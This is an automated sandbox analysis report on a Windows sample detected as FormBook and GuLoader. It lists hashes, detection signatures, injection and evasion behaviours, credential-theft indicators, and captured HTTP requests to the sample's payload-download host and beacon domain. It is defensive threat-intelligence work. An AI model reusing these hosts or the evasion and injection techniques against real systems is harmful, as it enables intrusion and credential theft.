Windows Analysis Report
Anfrage_244384.exe

Overview

General Information

Sample name: Anfrage_244384.exe
Analysis ID: 1550253
MD5: b03f23199ae987a7bce0ff1a0d742e3e
SHA1: f454c8de72926ee9f98db7056fa89f0c3ada9666
SHA256: eda014e3b658bfbbfd141c1459a3414d9ee8b7c139a3976fe732141fa9cf3f80
Tags: exe, user-threatcat_ch

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: Anfrage_244384.exe Avira: detected
Source: Yara match File source: 00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Anfrage_244384.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.40.95.144:443 -> 192.168.2.6:49927 version: TLS 1.2
Source: Anfrage_244384.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mshtml.pdb source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dptLotHBnXg.exe, 00000006.00000000.3013372549.00000000009CE000.00000002.00000001.01000000.00000009.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174453120.00000000009CE000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: wntdll.pdbUGP source: Anfrage_244384.exe, 00000004.00000003.2992504596.00000000342E0000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000003.2995103933.0000000034492000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3106086622.00000000043B3000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3098948159.0000000004205000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Anfrage_244384.exe, Anfrage_244384.exe, 00000004.00000003.2992504596.00000000342E0000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000003.2995103933.0000000034492000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, verclsid.exe, 00000007.00000003.3106086622.00000000043B3000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3098948159.0000000004205000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: verclsid.pdbGCTL source: Anfrage_244384.exe, 00000004.00000002.3092495841.00000000043DF000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092495841.000000000441D000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000002.3361641901.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: verclsid.pdb source: Anfrage_244384.exe, 00000004.00000002.3092495841.00000000043DF000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092495841.000000000441D000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000002.3361641901.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 0_2_00405665 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405665
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 0_2_0040270B FindFirstFileA, 0_2_0040270B
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 0_2_004060C7 FindFirstFileA,FindClose, 0_2_004060C7
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_003CC460 FindFirstFileW,FindNextFileW,FindClose, 7_2_003CC460
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 4x nop then xor eax, eax 7_2_003B9DF0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 4x nop then mov ebx, 00000004h 7_2_048B04E8
Source: Joe Sandbox View IP Address: 188.40.95.144 188.40.95.144
Source: Joe Sandbox View IP Address: 194.58.112.174 194.58.112.174
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49753
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49926
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49927 -> 188.40.95.144:443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /LxuQG254.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: familytherapycenter.rsCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sa87/?LJ=0zbXYrx&6X64=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8AmPqwLiPHc0f1bybms24K+7m7zNAaNQIZa1j2XstdwJ+GTV4HpA= HTTP/1.1Host: www.svarus.onlineAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
Source: global traffic DNS traffic detected: DNS query: familytherapycenter.rs
Source: global traffic DNS traffic detected: DNS query: www.svarus.online
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 15:12:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
Source: verclsid.exe, 00000007.00000002.3363414248.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362682978.0000000004300000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174698379.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, Anfrage_244384.exe String found in binary or memory: http://crl.apple.com/root.crl0
Source: verclsid.exe, 00000007.00000002.3363414248.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362682978.0000000004300000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174698379.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, Anfrage_244384.exe String found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: Anfrage_244384.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Anfrage_244384.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: verclsid.exe, 00000007.00000002.3363414248.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362682978.0000000004300000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174698379.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, Anfrage_244384.exe String found in binary or memory: http://www.apple.com/appleca0
Source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Anfrage_244384.exe, 00000004.00000001.2596303421.00000000005F2000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Anfrage_244384.exe, 00000004.00000001.2596303421.00000000005F2000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://familytherapycenter.rs/
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092816967.00000000046B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://familytherapycenter.rs/LxuQG254.bin
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://familytherapycenter.rs/LxuQG254.bin2
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://familytherapycenter.rs/LxuQG254.binA
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://familytherapycenter.rs/LxuQG254.bink
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://familytherapycenter.rs/LxuQG254.binl
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://familytherapycenter.rs/LxuQG254.bins
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: verclsid.exe, 00000007.00000002.3361368137.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20M
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: verclsid.exe, 00000007.00000003.3288064546.00000000076CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10334
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.svarus.online&rand=
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://reg.ru
Source: verclsid.exe, 00000007.00000002.3363414248.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362682978.0000000004300000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174698379.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, Anfrage_244384.exe String found in binary or memory: https://www.apple.com/appleca/0
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_se
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_n
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_host
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/sozdanie-saita/
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.svarus.online&reg_source=parking_auto
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown HTTPS traffic detected: 188.40.95.144:443 -> 192.168.2.6:49927 version: TLS 1.2
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 0_2_0040511A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040511A

E-Banking Fraud

Source: Yara match File source: 00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Anfrage_244384.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B35C0 NtCreateMutant,LdrInitializeThunk, 4_2_346B35C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_346B2C70
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_346B2DF0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B3010 NtOpenDirectoryObject, 4_2_346B3010
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B3090 NtSetValueKey, 4_2_346B3090
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B3D70 NtOpenThread, 4_2_346B3D70
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B3D10 NtOpenProcessToken, 4_2_346B3D10
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B39B0 NtGetContextThread, 4_2_346B39B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B4650 NtSuspendThread, 4_2_346B4650
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B4340 NtSetContextThread, 4_2_346B4340
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2C60 NtCreateKey, 4_2_346B2C60
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2C00 NtQueryInformationProcess, 4_2_346B2C00
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2CF0 NtOpenProcess, 4_2_346B2CF0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2CC0 NtQueryVirtualMemory, 4_2_346B2CC0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2CA0 NtQueryInformationToken, 4_2_346B2CA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2D30 NtUnmapViewOfSection, 4_2_346B2D30
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2D00 NtSetInformationFile, 4_2_346B2D00
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2D10 NtMapViewOfSection, 4_2_346B2D10
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2DD0 NtDelayExecution, 4_2_346B2DD0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2DB0 NtEnumerateKey, 4_2_346B2DB0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2E30 NtWriteVirtualMemory, 4_2_346B2E30
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2EE0 NtQueueApcThread, 4_2_346B2EE0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2EA0 NtAdjustPrivilegesToken, 4_2_346B2EA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2E80 NtReadVirtualMemory, 4_2_346B2E80
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2F60 NtCreateProcessEx, 4_2_346B2F60
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2F30 NtCreateSection, 4_2_346B2F30
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2FE0 NtCreateFile, 4_2_346B2FE0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2FA0 NtQuerySection, 4_2_346B2FA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2FB0 NtResumeThread, 4_2_346B2FB0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2F90 NtProtectVirtualMemory, 4_2_346B2F90
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2AF0 NtWriteFile, 4_2_346B2AF0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2AD0 NtReadFile, 4_2_346B2AD0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2AB0 NtWaitForSingleObject, 4_2_346B2AB0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2B60 NtClose, 4_2_346B2B60
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2BE0 NtQueryValueKey, 4_2_346B2BE0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2BF0 NtAllocateVirtualMemory, 4_2_346B2BF0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2BA0 NtEnumerateValueKey, 4_2_346B2BA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B2B80 NtQueryInformationFile, 4_2_346B2B80
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D4650 NtSuspendThread,LdrInitializeThunk, 7_2_045D4650
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D4340 NtSetContextThread,LdrInitializeThunk, 7_2_045D4340
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2C70 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_045D2C70
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2C60 NtCreateKey,LdrInitializeThunk, 7_2_045D2C60
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2CA0 NtQueryInformationToken,LdrInitializeThunk, 7_2_045D2CA0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2D10 NtMapViewOfSection,LdrInitializeThunk, 7_2_045D2D10
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2D30 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_045D2D30
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2DD0 NtDelayExecution,LdrInitializeThunk, 7_2_045D2DD0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_045D2DF0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2EE0 NtQueueApcThread,LdrInitializeThunk, 7_2_045D2EE0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2E80 NtReadVirtualMemory,LdrInitializeThunk, 7_2_045D2E80
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2F30 NtCreateSection,LdrInitializeThunk, 7_2_045D2F30
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2FE0 NtCreateFile,LdrInitializeThunk, 7_2_045D2FE0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2FB0 NtResumeThread,LdrInitializeThunk, 7_2_045D2FB0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2AD0 NtReadFile,LdrInitializeThunk, 7_2_045D2AD0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2AF0 NtWriteFile,LdrInitializeThunk, 7_2_045D2AF0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2B60 NtClose,LdrInitializeThunk, 7_2_045D2B60
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_045D2BF0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2BE0 NtQueryValueKey,LdrInitializeThunk, 7_2_045D2BE0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2BA0 NtEnumerateValueKey,LdrInitializeThunk, 7_2_045D2BA0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D35C0 NtCreateMutant,LdrInitializeThunk, 7_2_045D35C0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D39B0 NtGetContextThread,LdrInitializeThunk, 7_2_045D39B0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2C00 NtQueryInformationProcess, 7_2_045D2C00
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2CC0 NtQueryVirtualMemory, 7_2_045D2CC0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2CF0 NtOpenProcess, 7_2_045D2CF0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2D00 NtSetInformationFile, 7_2_045D2D00
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2DB0 NtEnumerateKey, 7_2_045D2DB0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2E30 NtWriteVirtualMemory, 7_2_045D2E30
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2EA0 NtAdjustPrivilegesToken, 7_2_045D2EA0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2F60 NtCreateProcessEx, 7_2_045D2F60
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2F90 NtProtectVirtualMemory, 7_2_045D2F90
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2FA0 NtQuerySection, 7_2_045D2FA0
Source: C:\Windows\SysWOW64\verclsid.exe Code function: 7_2_045D2AB0 NtWaitForSingleObject, 7_2_045D2AB0
